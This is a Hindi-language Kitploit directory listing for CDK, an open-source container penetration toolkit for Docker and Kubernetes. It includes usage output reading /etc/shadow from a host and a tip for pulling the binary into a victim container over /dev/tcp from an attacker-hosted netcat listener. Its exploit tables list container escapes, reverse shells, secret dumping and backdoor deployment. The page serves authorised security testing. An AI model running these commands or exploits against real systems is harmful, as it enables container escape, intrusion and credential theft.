Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CDK — 📦 K8s, Docker और Containerd की सुरक्षा परीक्षण को आसान बनाएं। | Kitploit
उपकरण/GitHubGitHub/cdk-team/cdk
विशेषाधिकार वृद्धिटोहीकंटेनर सुरक्षास्थायित्व तंत्रशोषणपार्श्व आंदोलनपोस्ट-शोषणपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षाकंटेनर एस्केप
GitHubcdk-team/cdk

CDK

4.7k6063 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

📦 K8s, Docker और Containerd की सुरक्षा परीक्षण को आसान बनाएं।

रिपॉजिटरी देखेंवेबसाइट

CDK - जीरो डिपेंडेंसी कंटेनर पेनिट्रेशन टूलकिट

अंग्रेज़ी | 简体中文

png

कानूनी अस्वीकरण

बिना पूर्व पारस्परिक सहमति के लक्ष्यों पर हमला करने के लिए CDK का उपयोग अवैध है। CDK केवल सुरक्षा परीक्षण उद्देश्यों के लिए है।

अवलोकन

CDK एक ओपन-सोर्स कंटेनर पेनिट्रेशन टूलकिट है, जिसे बिना किसी OS निर्भरता के विभिन्न स्लिम्ड कंटेनरों में स्थिर शोषण प्रदान करने के लिए डिज़ाइन किया गया है। यह उपयोगी नेट-टूल्स और कई शक्तिशाली PoCs/EXPs के साथ आता है और आपको कंटेनर से बचने और आसानी से K8s क्लस्टर को अपने कब्जे में लेने में मदद करता है।

त्वरित आरंभ

मूल्यांकन जानकारी और एक अनुशंसित शोषण प्राप्त करने के लिए cdk eva चलाएं, फिर हमला शुरू करने के लिए cdk run चलाएं।

root@kitploit:~
> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

स्थापना/वितरण

https://github.com/cdk-team/CDK/releases/ से नवीनतम रिलीज़ डाउनलोड करें।

निष्पादन योग्य फ़ाइलों को लक्ष्य कंटेनर में डालें और परीक्षण शुरू करें।

सुझाव: वास्तविक दुनिया के पेनिट्रेशन परीक्षण में CDK को लक्ष्य कंटेनर में पहुंचाना

यदि आपके पास एक शोषण है जो फ़ाइल अपलोड कर सकता है, तो आप सीधे CDK बाइनरी अपलोड कर सकते हैं।

यदि आपके पास RCE शोषण है, लेकिन लक्ष्य कंटेनर में curl या wget नहीं है, तो आप CDK देने के लिए निम्न विधि का उपयोग कर सकते हैं:

  1. पहले, अपने होस्ट पर सार्वजनिक IP के साथ CDK बाइनरी होस्ट करें।
root@kitploit:~
(on your host)
nc -lvp 999 < cdk
  1. पीड़ित कंटेनर के अंदर निष्पादित करें
root@kitploit:~
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk

उपयोग

root@kitploit:~
Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of ectd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.
  --profile=<name> Select evaluation profile.

विशेषताएं

CDK में तीन मॉड्यूल हैं:

  1. मूल्यांकन: संभावित कमजोरी खोजने के लिए कंटेनर के अंदर जानकारी एकत्र करें।
  2. शोषण: कंटेनर से बचने, स्थिरता और पार्श्व गति के लिए
  3. उपकरण: TCP/HTTP अनुरोधों, टनल और K8s क्लस्टर प्रबंधन के लिए नेटवर्क-टूल्स और API।

मूल्यांकन मॉड्यूल

उपयोग

root@kitploit:~
cdk evaluate [--full]

शोषण मॉड्यूल

सभी उपलब्ध शोषण सूचीबद्ध करें:

root@kitploit:~
cdk run --list

लक्षित शोषण चलाएं:

root@kitploit:~
cdk run <script-name> [options]

पतले के बारे में नोट: पतला रिलीज़ सर्वरलेस फ़ंक्शंस जैसे अल्पकालिक कंटेनर शेल के लिए तैयार किया गया है। हम स्रोत कोड में बिल्ड टैग जोड़ते हैं और बाइनरी को हल्का बनाने के लिए कुछ शोषण काट देते हैं। 2MB फ़ाइल में 90% CDK फ़ंक्शन शामिल हैं, साथ ही आप अपनी खुद की हल्की बाइनरी बनाने के लिए CDK स्रोत कोड में उपयोगी शोषण चुन सकते हैं।

टूल मॉड्यूल

लिनक्स की तरह कमांड चलाना, इनपुट-आर्ग में थोड़ा अलग, उपयोग लिंक देखें।

root@kitploit:~
cdk nc [options]
cdk ps

रिलीज़ दस्तावेज़

यदि आप जानना चाहते हैं कि हमने नया संस्करण कैसे जारी किया, पतला कैसे उत्पादित होता है, हम upx संस्करण क्यों प्रदान करते हैं, सभी, सामान्य, पतला, upx के बीच अंतर क्या हैं, और अपने लिए एक स्वयं का रिलीज़ संकलित करने के लिए विशिष्ट CDK शोषण और उपकरण कैसे चुनें, कृपया Release Document देखें।

डेवलपर दस्तावेज़

  • कंटेनर में परीक्षण चलाएं।

CDK में योगदान

सबसे पहले, योगदान करने के लिए समय निकालने के लिए धन्यवाद!

निम्नलिखित योगदानकर्ताओं को धन्यवाद:

अधिक योगदानकर्ता:योगदानकर्ता सूची

बग रिपोर्टिंग

बग को GitHub Issues के रूप में ट्रैक किया जाता है। वर्तमान CDK संस्करण, त्रुटि संदेश और वातावरण के साथ एक मुद्दा बनाएं। समस्या को पुन: उत्पन्न करने वाले सटीक चरणों का वर्णन करें।

संवर्द्धन सुझाव

संवर्द्धन सुझाव GitHub Discussions के रूप में ट्रैक किए जाते हैं। आप यहां कोई भी विचार प्रकाशित कर सकते हैं और सीधे डेवलपर्स से चर्चा कर सकते हैं।

पुल अनुरोध

समस्याओं को ठीक करें या CDK की गुणवत्ता बनाए रखें:

  • वर्तमान CDK संस्करण, वातावरण, समस्या और समस्या को पुन: उत्पन्न करने वाले सटीक चरणों का वर्णन करें।
  • समस्या ठीक करने से पहले और बाद में स्क्रीनशॉट या लॉग चलाना।

नई सुविधा या शोषण:

  • बताएं कि यह संवर्द्धन अन्य उपयोगकर्ताओं के लिए क्यों उपयोगी होगा।
  • कृपया हमारे लिए योगदान की समीक्षा करने के लिए एक स्थायी वातावरण सक्षम करें।
  • यह नई सुविधा कैसे काम करती है, इसके बारे में स्क्रीनशॉट।
  • यदि आप नए मूल्यांकन/शोषण स्क्रिप्ट कमिट कर रहे हैं, तो कृपया अपने PR संदेश में एक सरल दस्तावेज़ जोड़ें, यहाँ एक उदाहरण है।

आयोजन

404StarLink 2.0 - गैलेक्सी

png

प्रोजेक्ट CDK अब 404Team Starlink Project 2.0 में शामिल है। CDK डेव-टीम से संपर्क करने के लिए StarLink समुदाय में शामिल हों।

  • https://github.com/knownsec/404StarLink2.0-Galaxy#community

BlackHat Asia 2021 Arsenal

  • https://www.blackhat.com/asia-21/arsenal/schedule/index.html#cdk-zero-dependency-container-penetration-toolkit-22422

HITB SecConf 2021 Amsterdam

  • ब्रिफिंग: "अटैक क्लाउड नेटिव Kubernetes"

WHC 2021 (补天白帽大会)

  • CDK: क्लाउड प्लेटफॉर्म के लिए एक बेहतरीन BugBounty टूल भी

KCON 2021 Arsenal

  • http://kcon.knownsec.com/2021/#/arsenal

Kubernetes सामुदायिक दिवस 2021

  • https://community.cncf.io/events/details/cncf-kcd-china-presents-kubernetes-community-days-china/
टूल डाउनलोड करें
रणनीतिस्क्रिप्टसमर्थितउपयोग/उदाहरण
सूचना संग्रहOS Basic Info✔link
सूचना संग्रहउपलब्ध क्षमताएँ✔link
सूचना संग्रहउपलब्ध Linux कमांड✔link
सूचना संग्रहमाउंट्स✔link
सूचना संग्रहनेट नेमस्पेस✔link
सूचना संग्रहसंवेदनशील ENV✔link
सूचना संग्रहसंवेदनशील प्रक्रिया✔link
सूचना संग्रहसंवेदनशील स्थानीय फ़ाइलें✔link
सूचना संग्रहKube-proxy Route Localnet(CVE-2020-8558)✔link
सूचना संग्रहDNS-आधारित सेवा खोज✔link
खोजK8s Api-सर्वर जानकारी✔link
खोजK8s सेवा-खाता जानकारी✔link
खोजक्लाउड प्रदाता मेटाडेटा API✔link
रणनीतितकनीकCDK शोषण नामसमर्थितपतले मेंदस्तावेज़
बचनाdocker-runc CVE-2019-5736runc-pwn✔✔
बचनाcontainerd-shim CVE-2020-15257shim-pwn✔link
बचनाdocker.sock PoC (DIND हमला)docker-sock-check✔✔link
बचनाdocker.sock RCEdocker-sock-pwn✔✔link
बचनाDocker API(2375) RCEdocker-api-pwn✔✔link
बचनाडिवाइस माउंट बचनाmount-disk✔✔link
बचनाLXCFS बचनाlxcfs-rw✔✔link
बचनाCgroups बचनाmount-cgroup✔✔link
बचनाअनप्रिविलेज्ड यूज़र नेमस्पेस का दुरुपयोग कर बचना CVE-2022-0492abuse-unpriv-userns✔✔link
बचनाProcfs बचनाmount-procfs✔✔link
बचनाPtrace बचना PoCcheck-ptrace✔✔link
बचनाRewrite Cgroup(devices.allow)rewrite-cgroup-devices✔✔link
बचनाहोस्ट सिस्टम से मनमानी फ़ाइल पढ़ें (CAP_DAC_READ_SEARCH)cap-dac-read-search✔✔link
खोजK8s घटक प्रोबservice-probe✔✔link
खोजIstio Sidecar मेटा डंप करेंistio-check✔✔link
खोजK8s Pod सुरक्षा नीतियां डंप करेंk8s-psp-dump✔link
दूरस्थ नियंत्रणरिवर्स शेलreverse-shell✔✔link
दूरस्थ नियंत्रणKubelet Execkubelet-exec✔✔
क्रेडेंशियल एक्सेसरजिस्ट्री ब्रूटफोर्सregistry-brute✔✔link
क्रेडेंशियल एक्सेसएक्सेस कुंजी स्कैनिंगak-leakage✔✔link
क्रेडेंशियल एक्सेसEtcd से K8s टोकन प्राप्त करेंetcd-get-k8s-token✔✔
क्रेडेंशियल एक्सेसK8s Secrets डंप करेंk8s-secret-dump✔✔link
क्रेडेंशियल एक्सेसK8s Config डंप करेंk8s-configmap-dump✔✔link
विशेषाधिकार वृद्धिK8s RBAC बाईपासk8s-get-sa-token✔✔link
विशेषाधिकार वृद्धिCVE-2026-31431 copy-fail (केवल non-root→root और x86_64)copy-fail-cve-2026-31431✔link
स्थिरताWebShell तैनात करेंwebshell-deploy✔✔link
स्थिरताबैकडोर Pod तैनात करेंk8s-backdoor-daemonset✔✔link
स्थिरताशैडो K8s api-सर्वर तैनात करेंk8s-shadow-apiserver✔link
स्थिरताK8s MITM हमला (CVE-2020-8554)k8s-mitm-clusterip✔✔link
स्थिरताK8s CronJob तैनात करेंk8s-cronjob✔✔link
कमांडविवरणसमर्थितउपयोग/उदाहरण
ncTCP टनल✔link
psप्रक्रिया जानकारी✔link
netstatजैसे "netstat -antup" कमांड✔
ifconfigनेटवर्क जानकारी✔link
viफ़ाइलें संपादित करें✔link
ectlectd कुंजियों की अनधिकृत गणना✔
kcurlK8s api-सर्वर को अनुरोध✔link
dcurlDocker HTTP API को अनुरोध✔link
ucurlDocker Unix Socket को अनुरोध✔link
rcurlDocker Registry API को अनुरोध
probeIP/पोर्ट स्कैनिंग✔link